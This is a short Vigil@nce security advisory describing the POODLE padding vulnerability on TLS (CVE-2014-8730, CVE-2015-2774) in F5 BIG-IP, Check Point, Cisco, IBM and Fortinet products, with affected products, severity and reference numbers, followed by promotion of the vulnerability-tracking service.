|The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.|
Check Point, Cisco, IBM, F5, FortiOS: information disclosure via POODLE on TLS
Synthesis of the vulnerability
An attacker, located as a Man-in-the-Middle, can decrypt a Terminating TLS session, in order to obtain sensitive information.
Vulnerable products: GAiA, CheckPoint IP Appliance, IPSO, CheckPoint Power-1 Appliance, SecurePlatform, CheckPoint Security Appliance, CheckPoint Smart-1, CheckPoint VSX-1, Cisco ACE, ASA, BIG-IP Hardware, TMOS, Fedora, FortiGate, FortiGate Virtual Appliance, FortiOS, DB2 UDB, Domino, Informix Server, Tivoli Directory Server, openSUSE, Solaris, Palo Alto Firewall PA***, PAN-OS, Ubuntu.
Severity of this weakness: 3/4.
Consequences of an attack: data reading.
Hacker's origin: internet client.
Number of vulnerabilities in this bulletin: 2.
Creation date: 09/12/2014.
Revision date: 17/12/2014.
Références of this bulletin: 1450666, 1610582, 1647054, 1692906, 1693052, 1693142, bulletinjul2017, CERTFR-2014-AVI-533, CSCus08101, CSCus09311, CVE-2014-8730, CVE-2015-2774, FEDORA-2015-12923, FEDORA-2015-12970, openSUSE-SU-2016:0523-1, sk103683, SOL15882, USN-3571-1, VIGILANCE-VUL-15756.
Description of the vulnerability
The VIGILANCE-VUL-15485 (POODLE) vulnerability originates from an incorrect management of SSLv3 padding.
The F5 BIG-IP product can be configured to "terminate" SSL/TLS sessions. However, even when TLS is used, this BIG-IP feature uses the SSLv3 function to manage the padding. TLS sessions are thus also vulnerable to POODLE.
The same vulnerability also impacts Check Point, Cisco, IBM and Fortinet products.
An attacker, located as a Man-in-the-Middle, can therefore decrypt a Terminating TLS session, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)
Computer vulnerabilities tracking service
Vigil@nce provides an application vulnerability watch. The Vigil@nce computer vulnerability tracking service alerts your teams of vulnerabilities or threats impacting your information system. The Vigil@nce security watch publishes vulnerability bulletins about threats impacting the information system. Each administrator can customize the list of products for which he wants to receive vulnerability alerts.